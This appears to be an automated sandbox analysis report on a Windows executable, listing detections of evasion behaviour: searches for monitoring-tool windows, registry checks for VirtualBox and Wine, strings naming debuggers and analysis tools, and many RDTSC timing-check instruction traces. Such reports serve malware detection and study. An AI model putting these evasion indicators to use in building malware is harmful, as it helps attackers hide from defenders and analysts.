Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01D06BCA push ss; iretd 0_3_01D06BDA
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01CF77E0 pushad ; ret 0_3_01CF77E1
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01CF9B99 pushfd ; iretd 0_3_01CF9B9A
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01D06BB7 push ds; iretd 0_3_01D06BBA
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01D06BB7 push ds; iretd 0_3_01D06BBA
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01D06BB7 push ds; iretd 0_3_01D06BBA
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01D06BB7 push ds; iretd 0_3_01D06BBA
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01CF57B8 push edi; iretd 0_3_01CF57BA
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01CFCB41 pushad ; iretd 0_3_01CFCB42
Source: C:\Users\user\Desktop\CMpuGis28l.exeCode function: 0_3_01CFCB29 pushad ; iretd 0_3_01CFCB3A
Source: CMpuGis28l.exeStatic PE information: section name: bxszsxlr entropy: 7.955545656668972

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\CMpuGis28l.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\CMpuGis28l.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\CMpuGis28l.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: CMpuGis28l.exe, 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp, CMpuGis28l.exe, 00000000.00000003.2440902371.0000000007A16000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 16BB8CF second address: 16BB8D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183A02D second address: 183A031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183A031 second address: 183A04B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334BA0034h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183A04B second address: 183A06B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F9334DAF99Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1839186 second address: 1839193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1839193 second address: 1839197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1839197 second address: 18391A7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9334BA0026h 0x00000008 jg 00007F9334BA0026h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18391A7 second address: 18391AC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18394A4 second address: 18394AE instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9334BA0026h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18394AE second address: 18394B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18394B8 second address: 18394D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9334BA0037h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18394D5 second address: 18394DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F9334DAF996h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1839675 second address: 1839685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334BA002Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1839685 second address: 183969C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183969C second address: 18396AF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F9334BA0028h 0x0000000c popad 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18396AF second address: 18396B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183C316 second address: 183C38A instructions: 0x00000000 rdtsc 0x00000002 js 00007F9334BA0026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F9334BA0028h 0x00000010 popad 0x00000011 xor dword ptr [esp], 15E4C6A1h 0x00000018 mov edi, dword ptr [ebp+12A227AAh] 0x0000001e cmc 0x0000001f push 00000003h 0x00000021 push edx 0x00000022 sub dword ptr [ebp+12A21CEBh], edi 0x00000028 pop ecx 0x00000029 push 00000000h 0x0000002b mov dx, 52D2h 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F9334BA0028h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b stc 0x0000004c mov cx, FAA5h 0x00000050 call 00007F9334BA0029h 0x00000055 jmp 00007F9334BA002Ch 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183C38A second address: 183C38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183C38E second address: 183C394 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183C394 second address: 183C41A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9334DAF9A3h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F9334DAF9A3h 0x00000013 mov eax, dword ptr [eax] 0x00000015 jc 00007F9334DAF99Eh 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push edx 0x00000020 push eax 0x00000021 jnl 00007F9334DAF996h 0x00000027 pop eax 0x00000028 pop edx 0x00000029 pop eax 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007F9334DAF998h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 movzx ecx, di 0x00000047 lea ebx, dword ptr [ebp+12BA3FF7h] 0x0000004d or ecx, dword ptr [ebp+12A22986h] 0x00000053 xchg eax, ebx 0x00000054 pushad 0x00000055 push ecx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183C41A second address: 183C42B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183C42B second address: 183C42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183C42F second address: 183C435 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183C435 second address: 183C452 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334DAF9A9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183C452 second address: 183C456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183C4C7 second address: 183C55F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jnl 00007F9334DAF99Ch 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+12A21BFDh], eax 0x0000001a sub edx, dword ptr [ebp+12A2270Ah] 0x00000020 call 00007F9334DAF999h 0x00000025 pushad 0x00000026 pushad 0x00000027 pushad 0x00000028 popad 0x00000029 jc 00007F9334DAF996h 0x0000002f popad 0x00000030 jmp 00007F9334DAF9A1h 0x00000035 popad 0x00000036 push eax 0x00000037 jg 00007F9334DAF9B6h 0x0000003d mov eax, dword ptr [esp+04h] 0x00000041 push ecx 0x00000042 push esi 0x00000043 pushad 0x00000044 popad 0x00000045 pop esi 0x00000046 pop ecx 0x00000047 mov eax, dword ptr [eax] 0x00000049 jp 00007F9334DAF9A0h 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185B8C6 second address: 185B8EE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9334BA002Ah 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F9334BA0035h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185BA7B second address: 185BA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185BA81 second address: 185BA9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0035h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185BA9D second address: 185BAA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185BAA3 second address: 185BAB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334BA0030h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185C0ED second address: 185C0F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185C0F3 second address: 185C109 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F9334BA002Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185C3C3 second address: 185C3D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334DAF99Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185C3D5 second address: 185C3DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185C94B second address: 185C951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185C951 second address: 185C95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9334BA0026h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185C95B second address: 185C95F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1851AEC second address: 1851B04 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9334BA0030h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1851B04 second address: 1851B08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1851B08 second address: 1851B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F9334BA002Eh 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007F9334BA0031h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1851B35 second address: 1851B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1851B3E second address: 1851B44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1851B44 second address: 1851B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185CAEC second address: 185CB1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F9334BA0026h 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F9334BA002Ch 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c popad 0x0000001d popad 0x0000001e jo 00007F9334BA0044h 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185CB1B second address: 185CB1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185D161 second address: 185D16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9334BA0026h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185D42C second address: 185D443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F9334DAF99Fh 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185D443 second address: 185D449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185D873 second address: 185D87B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185D87B second address: 185D88A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jg 00007F9334BA0026h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185D88A second address: 185D88E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185D88E second address: 185D894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 185FAD4 second address: 185FAD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1860255 second address: 1860268 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jng 00007F9334BA0038h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1860268 second address: 186026C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186026C second address: 1860270 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1860270 second address: 186028B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b jnl 00007F9334DAF99Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 186028B second address: 186028F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 182179D second address: 18217B9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9334DAF9A6h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18217B9 second address: 18217C3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9334BA002Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18217C3 second address: 18217CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18217CD second address: 18217D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18217D1 second address: 18217D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 181FBFE second address: 181FC1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F9334BA0033h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 181FC1C second address: 181FC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jp 00007F9334DAF996h 0x0000000c jmp 00007F9334DAF9A8h 0x00000011 jno 00007F9334DAF996h 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 181FC4F second address: 181FC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18682E7 second address: 18682EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18682EC second address: 1868314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 jns 00007F9334BA003Dh 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1868314 second address: 186831A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1868456 second address: 186845C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1868AB7 second address: 1868ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1868ABD second address: 1868AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1868AC3 second address: 1868ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1868ACD second address: 1868AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1868C33 second address: 1868C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
